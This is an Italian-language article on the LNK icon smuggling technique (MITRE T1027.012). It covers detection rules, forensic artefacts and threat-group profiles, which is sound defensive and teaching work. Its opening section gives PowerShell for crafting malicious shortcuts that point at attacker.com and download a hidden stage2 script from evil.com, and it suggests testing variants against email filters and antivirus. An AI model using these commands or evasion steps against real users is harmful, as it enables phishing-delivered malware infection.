LNK Icon Smuggling: Obfuscated Files or Information: LNK Icon Smuggling (T1027.012)

Creare un file LNK malevolo richiede manipolazione precisa dei metadati. Su Windows, puoi utilizzare PowerShell per generare un LNK che nasconde un URL nel campo icon:

$WshShell = New-Object -ComObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut("$Home\Desktop\Document.lnk")
$Shortcut.IconLocation = "http://attacker.com/payload.exe"
$Shortcut.Save()

Il vero trucco sta nel mascherare l'esecuzione. Gamaredon Group ha dimostrato come nascondere script malevoli all'interno di LNK utilizzando padding e offuscamento. Puoi replicare questa tecnica aggiungendo spazi extra nel campo target per oscurare lo script:

$Shortcut.TargetPath = "C:\Windows\System32\cmd.exe /c powershell -w hidden -c (New-Object Net.WebClient).DownloadFile('http://evil.com/stage2.ps1','%TEMP%\update.ps1')"

Per aumentare la credibilità, Mustang Panda programma i file LNK per mostrare icone PDF. Questo inganna le vittime facendole cliccare su quello che sembra un documento legittimo. La combinazione di icona familiare e nome file convincente aumenta drasticamente il tasso di successo.

In laboratorio, crea diversi template LNK con varie tecniche di offuscamento. Testa l'evasione dei filtri email popolari inviando i file attraverso diversi provider. Monitora quali varianti superano i controlli antimalware standard.

L'esecuzione post-compromissione offre ulteriori opportunità. Script malevoli possono generare dinamicamente file LNK sul sistema compromesso per scaricare tool aggiuntivi mantenendo un profilo basso.

La detection strategy DET0405 fornisce correlazioni specifiche per identificare LNK Icon Smuggling. Il cuore della rilevazione sta nel correlare l'esecuzione di file LNK con attività di rete sospette successive.

Configura Sysmon per catturare EventCode 1 (Process Creation) filtrando sui processi lanciati da file .lnk. La chiave è monitorare quando explorer.exe o winword.exe generano processi figli anomali dopo l'apertura di un LNK:

ParentProcessName contains "explorer.exe" AND CommandLine contains ".lnk" AND (ChildProcess contains "cmd.exe" OR ChildProcess contains "powershell.exe")

Il timing è critico. La finestra temporale tra esecuzione LNK e download del payload varia in base alle tattiche dell'attaccante. Alcuni gruppi inseriscono delay intenzionali per evadere la correlazione temporale.

Monitora le connessioni di rete generate entro 5 minuti dall'esecuzione di un LNK. Filtra i domini noti buoni e gli IP interni per ridurre i falsi positivi. Kimsuky utilizza padding con spazi extra nel campo target - cerca pattern di spazi multipli consecutivi nei log di processo.

L'analisi comportamentale deve includere:

• Creazione di file in %TEMP% dopo esecuzione LNK
• Connessioni HTTP/HTTPS verso IP esterni non categorizzati
• Processi che tentano di nascondere la finestra (-w hidden, -WindowStyle Hidden)

Implementa correlazioni multi-evento che collegano l'apertura del LNK con download successivi e esecuzione di payload. La detection efficace richiede visibilità end-to-end dalla manipolazione iniziale del file all'esecuzione finale del malware.

L'analisi forense di LNK Icon Smuggling inizia dall'esame dei file LNK stessi. Windows mantiene copie dei file LNK recenti in C:\Users[username]\AppData\Roaming\Microsoft\Windows\Recent.

Estrai i metadati del file LNK utilizzando tool forensi specializzati. Il campo IconLocation conterrà l'URL malevolo se la tecnica è stata utilizzata. Cerca anomalie come:

• IconLocation che punta a URL esterni invece di file locali
• Padding eccessivo con spazi nel campo TargetPath
• Timestamp di creazione che coincidono con altri indicatori di compromissione

La ricostruzione temporale deve mappare la sequenza completa. TONESHELL malware utilizza LNK con icone PDF per ingannare gli utenti. Nella timeline, vedrai:

1. Arrivo email con allegato LNK
2. Salvataggio file LNK sul desktop o cartella download
3. Esecuzione del LNK da parte dell'utente
4. Connessione di rete verso l'URL nel campo icon
5. Download del payload in cartelle temporanee
6. Esecuzione del binario scaricato

Esamina i Prefetch files per confermare l'esecuzione. I file .pf in C:\Windows\Prefetch registrano quando office.exe o altri binari mascherati sono stati lanciati.

Le tracce di rete nel registro di Windows rivelano le connessioni effettuate. Analizza HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap per URL aggiunti di recente.

La correlazione tra artefatti diversi costruisce la storia completa dell'intrusione, dalla ricezione iniziale del LNK all'esecuzione finale del malware.

Gamaredon Group (G0047) rappresenta il profilo più attivo nell'uso di LNK Icon Smuggling. Questo gruppo russo-parlante targeting principalmente l'Ucraina nasconde script malevoli all'interno di file LNK per mantenere persistenza nei sistemi compromessi.

Kimsuky (G0094) porta la tecnica a un livello superiore. Questo gruppo nordcoreano non solo utilizza il campo icon location per eseguire script malevoli, ma implementa padding sofisticato con spazi extra per oscurare lo script nel campo target. La loro specializzazione nel targeting di think tank e organizzazioni governative sudcoreane suggerisce evoluzione continua delle tecniche di evasione.

Mustang Panda (G0129) dimostra l'approccio più user-friendly. Programmano i file LNK per mostrare icone PDF familiari, aumentando drasticamente il tasso di click delle vittime. L'integrazione con il binario office.exe mascherato rivela una catena di infezione multi-stadio ben pianificata.

L'overlap tra questi gruppi suggerisce condivisione di TTP o evoluzione parallela. Tutti e tre targeting organizzazioni governative, indicando che LNK Icon Smuggling è particolarmente efficace contro ambienti con elevati controlli di sicurezza.

Il trend emergente mostra movimento verso:

• Maggiore offuscamento dei metadati LNK
• Integrazione con legitimate-looking binari
• Uso di CDN e servizi cloud per hosting dei payload
• Combinazione con altre tecniche di defense evasion

La previsione indica che vedremo LNK Icon Smuggling evolversi verso l'abuso di altri campi metadata nei file LNK, possibilmente integrando tecniche di steganografia per nascondere payload direttamente nel file.

Framework MITRE ATT&CK T1027.012. Campagne documentate di Gamaredon Group, Kimsuky e Mustang Panda. Detection strategy DET0405 per correlazione multi-evento. Risorse di analisi comportamentale endpoint per identificazione pattern LNK malevoli.